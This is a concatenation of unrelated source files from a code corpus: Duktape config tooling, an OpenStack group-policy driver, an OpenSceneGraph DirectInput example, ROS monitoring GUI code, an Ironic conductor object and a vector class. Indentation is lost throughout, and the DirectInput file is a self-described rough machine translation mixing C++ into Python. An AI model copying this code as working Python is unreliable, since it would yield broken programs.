parser.add_option('--emit-legacy-feature-check', dest='emit_legacy_feature_check', action='store_true', default=False, help='emit preprocessor checks to reject legacy feature options (DUK_OPT_xxx)')
parser.add_option('--emit-config-sanity-check', dest='emit_config_sanity_check', action='store_true', default=False, help='emit preprocessor checks for config option consistency (DUK_USE_xxx)')
parser.add_option('--omit-removed-config-options', dest='omit_removed_config_options', action='store_true', default=False, help='omit removed config options from generated headers')
parser.add_option('--omit-deprecated-config-options', dest='omit_deprecated_config_options', action='store_true', default=False, help='omit deprecated config options from generated headers')
parser.add_option('--omit-unused-config-options', dest='omit_unused_config_options', action='store_true', default=False, help='omit unused config options from generated headers')
parser.add_option('--add-active-defines-macro', dest='add_active_defines_macro', action='store_true', default=False, help='add DUK_ACTIVE_DEFINES macro, for development only')
parser.add_option('--define', type='string', metavar='OPTION', dest='force_options_yaml', action='callback', callback=add_force_option_define, default=force_options_yaml, help='force #define option using a C compiler like syntax, e.g. "--define DUK_USE_DEEP_C_STACK" or "--define DUK_USE_TRACEBACK_DEPTH=10"')
parser.add_option('-D', type='string', metavar='OPTION', dest='force_options_yaml', action='callback', callback=add_force_option_define, default=force_options_yaml, help='synonym for --define, e.g. "-DDUK_USE_DEEP_C_STACK" or "-DDUK_USE_TRACEBACK_DEPTH=10"')
parser.add_option('--undefine', type='string', metavar='OPTION', dest='force_options_yaml', action='callback', callback=add_force_option_undefine, default=force_options_yaml, help='force #undef option using a C compiler like syntax, e.g. "--undefine DUK_USE_DEEP_C_STACK"')
parser.add_option('-U', type='string', metavar='OPTION', dest='force_options_yaml', action='callback', callback=add_force_option_undefine, default=force_options_yaml, help='synonym for --undefine, e.g. "-UDUK_USE_DEEP_C_STACK"')
parser.add_option('--option-yaml', type='string', metavar='YAML', dest='force_options_yaml', action='callback', callback=add_force_option_yaml, default=force_options_yaml, help='force option(s) using inline YAML (e.g. --option-yaml "DUK_USE_DEEP_C_STACK: true")')
parser.add_option('--option-file', type='string', metavar='FILENAME', dest='force_options_yaml', action='callback', callback=add_force_option_file, default=force_options_yaml, help='YAML file(s) providing config option overrides')
parser.add_option('--fixup-file', type='string', metavar='FILENAME', dest='fixup_header_lines', action='callback', callback=add_fixup_header_file, default=fixup_header_lines, help='C header snippet file(s) to be appended to generated header, useful for manual option fixups')
parser.add_option('--fixup-line', type='string', metavar='LINE', dest='fixup_header_lines', action='callback', callback=add_fixup_header_line, default=fixup_header_lines, help='C header fixup line to be appended to generated header (e.g. --fixup-line "#define DUK_USE_FASTINT")')
parser.add_option('--sanity-warning', dest='sanity_strict', action='store_false', default=True, help='emit a warning instead of #error for option sanity check issues')
parser.add_option('--use-cpp-warning', dest='use_cpp_warning', action='store_true', default=False, help='emit a (non-portable) #warning when appropriate')
if direct:
parser.add_option('--git-commit', dest='git_commit', default=None, help='git commit hash to be included in header comments')
parser.add_option('--git-describe', dest='git_describe', default=None, help='git describe string to be included in header comments')
parser.add_option('--git-branch', dest='git_branch', default=None, help='git branch string to be included in header comments')
parser.add_option('--quiet', dest='quiet', action='store_true', default=False, help='Suppress info messages (show warnings)')
parser.add_option('--verbose', dest='verbose', action='store_true', default=False, help='Show verbose debug messages')
def parse_options():
commands = [
'duk-config-header',
'config-documentation'
]
parser = optparse.OptionParser(
usage='Usage: %prog [options] COMMAND',
description='Generate a duk_config.h or config option documentation based on config metadata.',
epilog='COMMAND can be one of: ' + ', '.join(commands) + '.'
)
add_genconfig_optparse_options(parser, direct=True)
(opts, args) = parser.parse_args()
return opts, args
def genconfig(opts, args):
# Log level.
if opts.quiet:
logger.setLevel(logging.WARNING)
elif opts.verbose:
logger.setLevel(logging.DEBUG)
if opts.support_feature_options:
raise Exception('--support-feature-options and support for DUK_OPT_xxx feature options are obsolete, use DUK_USE_xxx config options instead')
meta_dir = opts.config_metadata
if opts.config_metadata is None:
if os.path.isdir(os.path.join('.', 'config-options')):
opts.config_metadata = '.'
if opts.config_metadata is not None and os.path.isdir(opts.config_metadata):
meta_dir = opts.config_metadata
metadata_src_text = 'Using metadata directory: %r' % meta_dir
else:
raise Exception('metadata argument must be a directory (tar.gz no longer supported)')
scan_helper_snippets(os.path.join(meta_dir, 'helper-snippets'))
scan_use_defs(os.path.join(meta_dir, 'config-options'))
scan_opt_defs(os.path.join(meta_dir, 'feature-options'))
scan_use_tags()
scan_tags_meta(os.path.join(meta_dir, 'tags.yaml'))
logger.debug('%s, scanned %d DUK_USE_XXX, %d helper snippets' % \
(metadata_src_text, len(use_defs.keys()), len(helper_snippets)))
logger.debug('Tags: %r' % use_tags_list)
if len(args) == 0:
raise Exception('missing command')
cmd = args[0]
if cmd == 'duk-config-header':
# Generate a duk_config.h header with platform, compiler, and
# architecture either autodetected (default) or specified by
# user.
desc = [
'platform=' + ('any', opts.platform)[opts.platform is not None],
'architecture=' + ('any', opts.architecture)[opts.architecture is not None],
'compiler=' + ('any', opts.compiler)[opts.compiler is not None]
]
if opts.dll:
desc.append('dll mode')
logger.info('Creating duk_config.h: ' + ', '.join(desc))
result, active_opts = generate_duk_config_header(opts, meta_dir)
with open(opts.output, 'wb') as f:
f.write(result)
logger.debug('Wrote duk_config.h to ' + str(opts.output))
if opts.output_active_options is not None:
with open(opts.output_active_options, 'wb') as f:
f.write(json.dumps(active_opts, indent=4))
logger.debug('Wrote active options JSON metadata to ' + str(opts.output_active_options))
elif cmd == 'feature-documentation':
raise Exception('The feature-documentation command has been removed along with DUK_OPT_xxx feature option support')
elif cmd == 'config-documentation':
logger.info('Creating config option documentation')
result = generate_config_option_documentation(opts)
with open(opts.output, 'wb') as f:
f.write(result)
logger.debug('Wrote config option documentation to ' + str(opts.output))
else:
raise Exception('invalid command: %r' % cmd)
def main():
opts, args = parse_options()
genconfig(opts, args)
if __name__ == '__main__':
main()
license: mit

repo_name: noironetworks/group-based-policy
path: gbpservice/neutron/services/grouppolicy/drivers/extensions/aim_mapping_extension_driver.py
copies: 1
size: 4344
content:
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron_lib.plugins import directory
from oslo_log import log as logging
import sqlalchemy as sa
from sqlalchemy.ext import baked
from gbpservice.neutron.db.grouppolicy.extensions import (
apic_auto_ptg_db as auto_ptg_db)
from gbpservice.neutron.db.grouppolicy.extensions import (
apic_intra_ptg_db as intra_ptg_db)
from gbpservice.neutron.db.grouppolicy import group_policy_db as gp_db
from gbpservice.neutron.extensions import cisco_apic_gbp
from gbpservice.neutron.extensions import group_policy as gpolicy
from gbpservice.neutron.services.grouppolicy import (
group_policy_driver_api as api)
LOG = logging.getLogger(__name__)
BAKERY = baked.bakery(_size_alert=lambda c: LOG.warning(
"sqlalchemy baked query cache size exceeded in %s", __name__))
class AIMExtensionDriver(api.ExtensionDriver,
intra_ptg_db.ApicIntraPtgDBMixin,
auto_ptg_db.ApicAutoPtgDBMixin):
_supported_extension_alias = cisco_apic_gbp.ALIAS
_extension_dict = cisco_apic_gbp.EXTENDED_ATTRIBUTES_2_0
def __init__(self):
LOG.info("AIM Extension __init__")
self._policy_driver = None
@property
def _pd(self):
if not self._policy_driver:
gbp_plugin = directory.get_plugin("GROUP_POLICY")
policy_mgr = gbp_plugin.policy_driver_manager
self._policy_driver = policy_mgr.policy_drivers['aim_mapping'].obj
return self._policy_driver
def initialize(self):
pass
@property
def extension_alias(self):
return self._supported_extension_alias
def _set_intra_ptg_allow(self, session, data, result):
ptg = data['policy_target_group']
query = BAKERY(lambda s: s.query(
gp_db.PolicyTargetGroup))
query += lambda q: q.filter_by(
id=sa.bindparam('id'))
ptg_db = query(session).params(
id=result['id']).one()
if not ptg_db:
raise gpolicy.PolicyTargetGroupNotFound(
policy_target_group_id=result['id'])
if 'intra_ptg_allow' in ptg:
self.set_intra_ptg_allow(
session, policy_target_group_id=result['id'],
intra_ptg_allow=ptg['intra_ptg_allow'])
result['intra_ptg_allow'] = ptg['intra_ptg_allow']
else:
self._extend_ptg_dict_with_intra_ptg_allow(session, result)
def _extend_ptg_dict_with_intra_ptg_allow(self, session, result):
result['intra_ptg_allow'] = self.get_intra_ptg_allow(
session, policy_target_group_id=result['id'])
def process_create_policy_target_group(self, session, data, result):
self._set_intra_ptg_allow(session, data, result)
result['is_auto_ptg'] = bool(
gpolicy.AUTO_PTG_REGEX.match(result['id']))
self.set_is_auto_ptg(
session, policy_target_group_id=result['id'],
is_auto_ptg=result['is_auto_ptg'])
def process_update_policy_target_group(self, session, data, result):
self._set_intra_ptg_allow(session, data, result)
def extend_policy_target_group_dict(self, session, result):
self._extend_ptg_dict_with_intra_ptg_allow(session, result)
result['is_auto_ptg'] = self.get_is_auto_ptg(
session, policy_target_group_id=result['id'])
self._pd.extend_policy_target_group_dict(session, result)
def extend_application_policy_group_dict(self, session, result):
self._pd.extend_application_policy_group_dict(session, result)
def extend_policy_rule_dict(self, session, result):
self._pd.extend_policy_rule_dict(session, result)
def extend_policy_rule_set_dict(self, session, result):
self._pd.extend_policy_rule_set_dict(session, result)
license: apache-2.0

repo_name: JaneliaSciComp/osgpyplusplus
path: examples/rough_translated1/osgdirectinput.py
copies: 1
size: 10576
content:
#!/bin/env python
# Automatically translated python version of
# OpenSceneGraph example program "osgdirectinput"
# !!! This program will need manual tuning before it will work. !!!
import sys
from osgpypp import osgDB
from osgpypp import osgGA
from osgpypp import osgViewer
# Translated from file 'DirectInputRegistry.cpp'
# OpenSceneGraph example, osgdirectinput.
#*
#* Permission is hereby granted, free of charge, to any person obtaining a copy
#* of this software and associated documentation files (the "Software"), to deal
#* in the Software without restriction, including without limitation the rights
#* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#* copies of the Software, and to permit persons to whom the Software is
#* furnished to do so, subject to the following conditions:
#*
#* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
#* THE SOFTWARE.
#
#include <osgGA/EventQueue>
#include <iostream>
#include "DirectInputRegistry"
typedef std.pair<int, int> KeyValue
typedef std.map<int, KeyValue> KeyMap
g_keyMap = KeyMap()
def buildKeyMap():
# TODO: finish the key map as you wish
g_keyMap[DIK_ESCAPE] = KeyValue(osgGA.GUIEventAdapter.KEY_Escape, 0)
g_keyMap[DIK_1] = KeyValue(ord("1"), 0)
g_keyMap[DIK_2] = KeyValue(ord("2"), 0)
g_keyMap[DIK_3] = KeyValue(ord("3"), 0)
g_keyMap[DIK_4] = KeyValue(ord("4"), 0)
g_keyMap[DIK_5] = KeyValue(ord("5"), 0)
g_keyMap[DIK_6] = KeyValue(ord("6"), 0)
g_keyMap[DIK_7] = KeyValue(ord("7"), 0)
g_keyMap[DIK_8] = KeyValue(ord("8"), 0)
g_keyMap[DIK_9] = KeyValue(ord("9"), 0)
g_keyMap[DIK_0] = KeyValue(ord("0"), 0)
g_keyMap[DIK_MINUS] = KeyValue(ord("-"), 0)
g_keyMap[DIK_EQUALS] = KeyValue(ord("="), 0)
g_keyMap[DIK_BACK] = KeyValue(osgGA.GUIEventAdapter.KEY_BackSpace, 0)
g_keyMap[DIK_TAB] = KeyValue(osgGA.GUIEventAdapter.KEY_Tab, 0)
g_keyMap[DIK_SPACE] = KeyValue(osgGA.GUIEventAdapter.KEY_Space, 0)
bool DirectInputRegistry.initKeyboard( HWND handle )
if not _inputDevice : return False
hr = _inputDevice.CreateDevice( GUID_SysKeyboard, _keyboard, NULL )
if FAILED(hr) or _keyboard==NULL :
osg.notify(osg.WARN), "Unable to create keyboard."
return False
buildKeyMap()
return initImplementation( handle, _keyboard, c_dfDIKeyboard )
bool DirectInputRegistry.initMouse( HWND handle )
if not _inputDevice : return False
hr = _inputDevice.CreateDevice( GUID_SysMouse, _mouse, NULL )
if FAILED(hr) or _mouse==NULL :
osg.notify(osg.WARN), "Unable to create mouse."
return False
return initImplementation( handle, _mouse, c_dfDIMouse2 )
bool DirectInputRegistry.initJoystick( HWND handle )
if not _inputDevice : return False
hr = _inputDevice.EnumDevices( DI8DEVCLASS_GAMECTRL, EnumJoysticksCallback,
NULL, DIEDFL_ATTACHEDONLY )
if FAILED(hr) or _joystick==NULL :
osg.notify(osg.WARN), "Unable to enumerate joysticks."
return False
return initImplementation( handle, _joystick, c_dfDIJoystick2 )
void DirectInputRegistry.updateState( osgGA.EventQueue* eventQueue )
hr = HRESULT()
if not _supportDirectInput or not eventQueue : return
if _keyboard :
pollDevice( _keyboard )
char buffer[256] = 0
hr = _keyboard.GetDeviceState( sizeof(buffer), buffer )
if SUCCEEDED(hr) :
for ( KeyMap.iterator itr=g_keyMap.begin() itr not =g_keyMap.end() ++itr )
key = itr.second
value = buffer[itr.first]
if key.second==value : continue
key.second = value
if value & 0x80 :
eventQueue.keyPress( key.first )
else:
eventQueue.keyRelease( key.first )
if _mouse :
pollDevice( _mouse )
mouseState = DIMOUSESTATE2()
hr = _mouse.GetDeviceState( sizeof(DIMOUSESTATE2), mouseState )
# TODO: add mouse handlers
if _joystick :
pollDevice( _joystick )
event = JoystickEvent()
hr = _joystick.GetDeviceState( sizeof(DIJOYSTATE2), (event._js) )
if SUCCEEDED(hr) : eventQueue.userEvent( event )
DirectInputRegistry.DirectInputRegistry()
: _keyboard(0), _mouse(0), _joystick(0),
_supportDirectInput(True)
hr = DirectInput8Create( GetModuleHandle(NULL), DIRECTINPUT_VERSION,
IID_IDirectInput8, (VOID**)_inputDevice, NULL )
if FAILED(hr) :
osg.notify(osg.WARN), "Unable to create DirectInput object."
_supportDirectInput = False
DirectInputRegistry.~DirectInputRegistry()
releaseDevice( _keyboard )
releaseDevice( _mouse )
releaseDevice( _joystick )
if _inputDevice : _inputDevice.Release()
bool DirectInputRegistry.initImplementation( HWND handle, LPDIRECTINPUTDEVICE8 device, LPCDIDATAFORMAT format )
_supportDirectInput = True
hr = device.SetDataFormat( format )
if FAILED(hr) :
osg.notify(osg.WARN), "Unable to set device data format."
_supportDirectInput = False
hr = device.SetCooperativeLevel( handle, DISCL_EXCLUSIVE|DISCL_FOREGROUND )
if FAILED(hr) :
osg.notify(osg.WARN), "Unable to attach device to window."
_supportDirectInput = False
device.Acquire()
return _supportDirectInput
void DirectInputRegistry.pollDevice( LPDIRECTINPUTDEVICE8 device )
hr = device.Poll()
if FAILED(hr) :
device.Acquire()
if hr==DIERR_INPUTLOST :
osg.notify(osg.WARN), "Device lost."
void DirectInputRegistry.releaseDevice( LPDIRECTINPUTDEVICE8 device )
if device :
device.Unacquire()
device.Release()
BOOL CALLBACK DirectInputRegistry.EnumJoysticksCallback( DIDEVICEINSTANCE* didInstance, VOID* )
hr = HRESULT()
device = DirectInputRegistry.instance().getDevice()
if device :
hr = device.CreateDevice( didInstance.guidInstance,
(DirectInputRegistry.instance().getJoyStick()), NULL )
if FAILED(hr) : return DIENUM_CONTINUE
return DIENUM_STOP
# Translated from file 'osgdirectinput.cpp'
# OpenSceneGraph example, osgdirectinput.
#*
#* Permission is hereby granted, free of charge, to any person obtaining a copy
#* of this software and associated documentation files (the "Software"), to deal
#* in the Software without restriction, including without limitation the rights
#* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#* copies of the Software, and to permit persons to whom the Software is
#* furnished to do so, subject to the following conditions:
#*
#* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
#* THE SOFTWARE.
#
#include <osgDB/ReadFile>
#include <osgGA/StateSetManipulator>
#include <osgViewer/api/Win32/GraphicsWindowWin32>
#include <osgViewer/Viewer>
#include <osgViewer/ViewerEventHandlers>
#include <iostream>
#include "DirectInputRegistry"
class CustomViewer (osgViewer.Viewer) :
CustomViewer() : osgViewer.Viewer()
virtual ~CustomViewer()
def eventTraversal():
DirectInputRegistry.instance().updateState( _eventQueue )
osgViewer.Viewer.eventTraversal()
def viewerInit():
windowWin32 = dynamic_cast<osgViewer.GraphicsWindowWin32*>( _camera.getGraphicsContext() )
if windowWin32 :
hwnd = windowWin32.getHWND()
DirectInputRegistry.instance().initKeyboard( hwnd )
#DirectInputRegistry.instance().initMouse( hwnd )
DirectInputRegistry.instance().initJoystick( hwnd )
osgViewer.Viewer.viewerInit()
class JoystickHandler (osgGA.GUIEventHandler) :
JoystickHandler()
def handle(ea, aa):
switch ( ea.getEventType() )
case osgGA.GUIEventAdapter.KEYDOWN:
print "*** Key 0x", std.hex, ea.getKey(), std.dec, " down ***"
break
case osgGA.GUIEventAdapter.KEYUP:
print "*** Key 0x", std.hex, ea.getKey(), std.dec, " up ***"
break
case osgGA.GUIEventAdapter.USER:
event = dynamic_cast< JoystickEvent*>( ea.getUserData() )
if not event : break
js = event._js
for ( unsigned int i=0 i<128 ++i )
if js.rgbButtons[i] :
print "*** Joystick Btn", i, " = ", (int)js.rgbButtons[i]
if js.lX==0x0000 : print "*** Joystick X-"
elif js.lX==0xffff : print "*** Joystick X+"
if js.lY==0 : print "*** Joystick Y-"
elif js.lY==0xffff : print "*** Joystick Y+"
return True
default:
break
return False
def main(argv):
arguments = osg.ArgumentParser( argc, argv )
model = osgDB.readNodeFiles( arguments )
if not model : model = osgDB.readNodeFile( "cow.osgt" )
if not model :
print arguments.getApplicationName(), ": No data loaded"
return 1
viewer = CustomViewer()
viewer.addEventHandler( JoystickHandler )()
viewer.addEventHandler( osgViewer.StatsHandler )()
viewer.addEventHandler( osgViewer.WindowSizeHandler )()
viewer.addEventHandler( osgGA.StateSetManipulator(viewer.getCamera().getOrCreateStateSet()) )
viewer.setSceneData( model )
viewer.setUpViewInWindow( 250, 50, 800, 600 )
return viewer.run()
if __name__ == "__main__":
main(sys.argv)
license: bsd-3-clause

repo_name: ROS-PSE/arni
path: arni_gui/src/arni_gui/connection_item.py
copies: 1
size: 7933
content:
import genpy
from rospy.rostime import Time, Duration
from python_qt_binding.QtCore import QTranslator
from abstract_item import AbstractItem
from helper_functions import prepare_number_for_representation, MAXIMUM_OFFLINE_TIME, ROUND_DIGITS
class ConnectionItem(AbstractItem):
"""
A ConnectionItem reresents the connection between a publisher and a subscriber and the topic they are publishing / listening on
"""
def __init__(self, logger, seuid, first_message, parent=None):
"""
Initializes the ConnectionItem.
:param seuid: the seuid of the item
:type seuid: str
:param logger: a logger where to log when special events occur
:type logger: ModelLogger
:param type: the type of the item
:type type: str
:param parent: the parent-item
:type parent: AbstractItem
"""
AbstractItem.__init__(self, logger, seuid, parent)
self.__parent = parent
self._type = "connection"
self.add_keys=["dropped_msgs", "traffic"]
self.avg_keys=["period_mean", "period_stddev", "stamp_age_mean", "stamp_age_stddev", "bandwidth", "frequency"]
self.max_keys=["period_max", "stamp_age_max"]
self._attributes = []
self._attributes.extend(["dropped_msgs", "traffic",
"period_mean", "period_stddev", "period_max", "stamp_age_mean",
"stamp_age_stddev", "stamp_age_max", "bandwidth", "frequency"])
for item in self._attributes:
self._add_data_list(item)
for item in self._attributes:
self._rated_attributes.append(item + ".actual_value")
self._rated_attributes.append(item + ".expected_value")
self._rated_attributes.append(item + ".state")
for item in self._rated_attributes:
self._add_rated_data_list(item)
self._logger.log("info", Time.now(), seuid, "Created a new ConnectionItem")
self.show_as_subscriber = False
self.tree_item1 = None
self.tree_item2 = None
def aggregate_data(self, period):
"""
:param period: The amount in seconds over which the data should be aggregated.
:return:
"""
values = {}
for key in self._attributes:
values[key] = 0
entries = self.get_items_younger_than(Time.now() - (Duration(secs=period) if int(Duration(secs=period).to_sec()) <= int(Time.now().to_sec()) else Time(0) ))
length = len(entries["window_stop"]) if entries["window_stop"] else 0
if length > 0:
for key in self.add_keys:
for i in range(0, length):
values[key] += entries[key][i]
for key in self.max_keys:
if type(entries[key][-1]) == genpy.rostime.Time or type(entries[key][-1]) == genpy.rostime.Duration:
for i in range(0, length):
if entries[key][i].to_sec() > values[key]:
values[key] = entries[key][i].to_sec()
else:
for i in range(0, length):
if entries[key][i] > values[key]:
values[key] = entries[key][i]
for key in self.avg_keys:
if type(entries[key][0]) is genpy.rostime.Time or type(entries[key][0]) is genpy.rostime.Duration:
for i in range(0, length):
values[key] += entries[key][i].to_sec()
else:
for i in range(0, length):
values[key] += entries[key][i]
values[key] = values[key] / length
return values
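# Rough usage sketch (not part of the original class): for an already populated
# item, aggregating the last 10 seconds yields one dict keyed by attribute name:
# values = connection_item.aggregate_data(10)
# values["dropped_msgs"]   # summed over the window
# values["frequency"]      # averaged over the window
# values["period_max"]     # maximum observed in the window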
def execute_action(self, action):
"""
Not applicable: a Connection cannot execute actions.
:param action: action to be executed
:type action: RemoteAction
"""
pass
def get_detailed_data(self):
"""
Returns the detailed data of the ConnectionItem.
:returns: str
"""
data_dict = self.get_latest_data()
if Time.now() - data_dict["window_stop"] > Duration(secs=5):
return "No recent data"
content = "<p class=\"detailed_data\">"
content += self.get_erroneous_entries()
if "frequency" in self._attributes:
content += self.tr("frequency") + ": " + prepare_number_for_representation(data_dict["frequency"]) \
+ " " + self.tr("frequency_unit") + " <br>"
content += self.tr("dropped_msgs") + ": " + prepare_number_for_representation(data_dict["dropped_msgs"]) + " " \
+ self.tr("dropped_msgs_unit") + " <br>"
content += self.tr("bandwidth") + ": " + prepare_number_for_representation(data_dict["bandwidth"]) + " " \
+ " " + self.tr("bandwidth_unit") + " <br>"
content += self.tr("period_mean") + ": " + prepare_number_for_representation(data_dict["period_mean"]) \
+ " " + self.tr("period_mean_unit") + " <br>"
content += self.tr("period_stddev") + ": " + prepare_number_for_representation(data_dict["period_stddev"]) \
+ " " + self.tr("period_stddev_unit") + " <br>"
content += self.tr("period_max") + ": " + prepare_number_for_representation(data_dict["period_max"]) + " " \
+ self.tr("period_max_unit") + " <br>"
content += self.tr("stamp_age_mean") + ": " + prepare_number_for_representation(data_dict["stamp_age_mean"]) \
+ " " + self.tr("stamp_age_mean_unit") + " <br>"
content += self.tr("stamp_age_stddev") + ": " + prepare_number_for_representation(data_dict["stamp_age_stddev"]) \
+ " " + self.tr("stamp_age_stddev_unit") + " <br>"
content += self.tr("stamp_age_max") + ": " + prepare_number_for_representation(data_dict["stamp_age_max"]) \
+ " " + self.tr("stamp_age_max_unit") + " <br>"
content += "</p>"
return content
def get_plotable_items(self):
"""
Returns items for the plot.
:returns: str[]
"""
return ["dropped_msgs", "bandwidth", "frequency", "period_mean", "period_stddev", "period_max", "stamp_age_mean",
"stamp_age_stddev", "stamp_age_max"]
def get_short_data(self):
"""
Returns a shortened version of the item data.
:returns: data of the item
:rtype: str
"""
data_dict = self.get_latest_data()
if data_dict["window_stop"] == Time(0):
return "No data yet"
elif (Time.now() - data_dict["window_stop"]) > Duration(MAXIMUM_OFFLINE_TIME):
# last entry was more than MAXIMUM_OFFLINE_TIME ago, it could be offline!
return "No data since " + prepare_number_for_representation(Time.now() - data_dict["window_stop"]) \
+ " seconds"
content = ""
if data_dict["state"] is "error":
content += self.get_erroneous_entries_for_log()
else:
content += self.tr("frequency") + ": " + prepare_number_for_representation(data_dict["frequency"]) \
+ " " + self.tr("frequency_unit") + " - "
content += self.tr("bandwidth") + ": " + prepare_number_for_representation(
data_dict["bandwidth"]) + " " \
+ self.tr("bandwidth_unit") + " - "
content += self.tr("dropped_msgs") + ": " + prepare_number_for_representation(data_dict["dropped_msgs"]) \
+ " " + self.tr("dropped_msgs_unit")
return content
def get_list_items(self):
return []
def get_time_items(self):
return ["period_mean", "period_stddev", "period_max", "stamp_age_mean",
"stamp_age_stddev", "stamp_age_max"]
license: bsd-2-clause

repo_name: pshchelo/ironic
path: ironic/objects/conductor.py
copies: 1
size: 6820
content:
# coding=utf-8
#
# Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_versionedobjects import base as object_base
from ironic.common.i18n import _
from ironic.db import api as db_api
from ironic.objects import base
from ironic.objects import fields as object_fields
@base.IronicObjectRegistry.register
class Conductor(base.IronicObject, object_base.VersionedObjectDictCompat):
# Version 1.0: Initial version
# Version 1.1: Add register() and unregister(), make the context parameter
# to touch() optional.
# Version 1.2: Add register_hardware_interfaces() and
# unregister_all_hardware_interfaces()
VERSION = '1.2'
dbapi = db_api.get_instance()
fields = {
'id': object_fields.IntegerField(),
'drivers': object_fields.ListOfStringsField(nullable=True),
'hostname': object_fields.StringField(),
}
# NOTE(xek): We don't want to enable RPC on this call just yet. Remotable
# methods can be used in the future to replace current explicit RPC calls.
# Implications of calling new remote procedures should be thought through.
# @object_base.remotable_classmethod
@classmethod
def get_by_hostname(cls, context, hostname):
"""Get a Conductor record by its hostname.
:param cls: the :class:`Conductor`
:param context: Security context
:param hostname: the hostname on which a Conductor is running
:returns: a :class:`Conductor` object.
"""
db_obj = cls.dbapi.get_conductor(hostname)
conductor = cls._from_db_object(context, cls(), db_obj)
return conductor
def save(self, context):
"""Save is not supported by Conductor objects."""
raise NotImplementedError(
_('Cannot update a conductor record directly.'))
# NOTE(xek): We don't want to enable RPC on this call just yet. Remotable
# methods can be used in the future to replace current explicit RPC calls.
# Implications of calling new remote procedures should be thought through.
# @object_base.remotable
def refresh(self, context=None):
"""Loads and applies updates for this Conductor.
Loads a :class:`Conductor` with the same uuid from the database and
checks for updated attributes. Updates are applied from
the loaded conductor column by column, if there are any updates.
:param context: Security context. NOTE: This should only
be used internally by the indirection_api.
Unfortunately, RPC requires context as the first
argument, even though we don't use it.
A context should be set when instantiating the
object, e.g.: Conductor(context)
"""
current = self.get_by_hostname(self._context, hostname=self.hostname)
self.obj_refresh(current)
# NOTE(xek): We don't want to enable RPC on this call just yet. Remotable
# methods can be used in the future to replace current explicit RPC calls.
# Implications of calling new remote procedures should be thought through.
# @object_base.remotable
def touch(self, context=None):
"""Touch this conductor's DB record, marking it as up-to-date."""
self.dbapi.touch_conductor(self.hostname)
# NOTE(xek): We don't want to enable RPC on this call just yet. Remotable
# methods can be used in the future to replace current explicit RPC calls.
# Implications of calling new remote procedures should be thought through.
# @object_base.remotable
@classmethod
def register(cls, context, hostname, drivers, update_existing=False):
"""Register an active conductor with the cluster.
:param cls: the :class:`Conductor`
:param context: Security context
:param hostname: the hostname on which the conductor will run
:param drivers: the list of drivers enabled in the conductor
:param update_existing: When false, registration will raise an
exception when a conflicting online record
is found. When true, will overwrite the
existing record. Default: False.
:raises: ConductorAlreadyRegistered
:returns: a :class:`Conductor` object.
"""
db_cond = cls.dbapi.register_conductor(
{'hostname': hostname,
'drivers': drivers,
'version': cls.get_target_version()},
update_existing=update_existing)
return cls._from_db_object(context, cls(), db_cond)
# NOTE(xek): We don't want to enable RPC on this call just yet. Remotable
# methods can be used in the future to replace current explicit RPC calls.
# Implications of calling new remote procedures should be thought through.
# @object_base.remotable
def unregister(self, context=None):
"""Remove this conductor from the service registry."""
self.unregister_all_hardware_interfaces()
self.dbapi.unregister_conductor(self.hostname)
def register_hardware_interfaces(self, hardware_type, interface_type,
interfaces, default_interface):
"""Register hardware interfaces with the conductor.
:param hardware_type: Name of hardware type for the interfaces.
:param interface_type: Type of interfaces, e.g. 'deploy' or 'boot'.
:param interfaces: List of interface names to register.
:param default_interface: String, the default interface for this
hardware type and interface type.
"""
self.dbapi.register_conductor_hardware_interfaces(self.id,
hardware_type,
interface_type,
interfaces,
default_interface)
def unregister_all_hardware_interfaces(self):
"""Unregister all hardware interfaces for this conductor."""
self.dbapi.unregister_conductor_hardware_interfaces(self.id)
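# Rough lifecycle sketch (assumed usage; names are placeholders, not part of the
# original module):
# cond = Conductor.register(ctx, 'conductor-host-1', ['fake-hardware'], update_existing=True)
# cond.touch()        # periodic heartbeat, marks the DB row as up to date
# cond.unregister()   # drops hardware interfaces, then the conductor registration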
license: apache-2.0

repo_name: astrofra/demo-unusual-suspects
path: Python-toolchain/3D/vector3.py
copies: 1
size: 17953
content:
from math import *
from util import format_number
class Vector3(object):
__slots__ = ('_v',)
def __init__(self, *args):
"""Creates a Vector3 from 3 numeric values or a list-like object
containing at least 3 values. No arguments result in a null vector.
"""
if len(args) == 3:
self._v = map(float, args[:3])
return
if not args:
self._v = [0., 0., 0.]
elif len(args) == 1:
self._v = map(float, args[0][:3])
else:
raise ValueError("Vector3.__init__ takes 0, 1 or 3 parameters")
@classmethod
def from_points(cls, p1, p2):
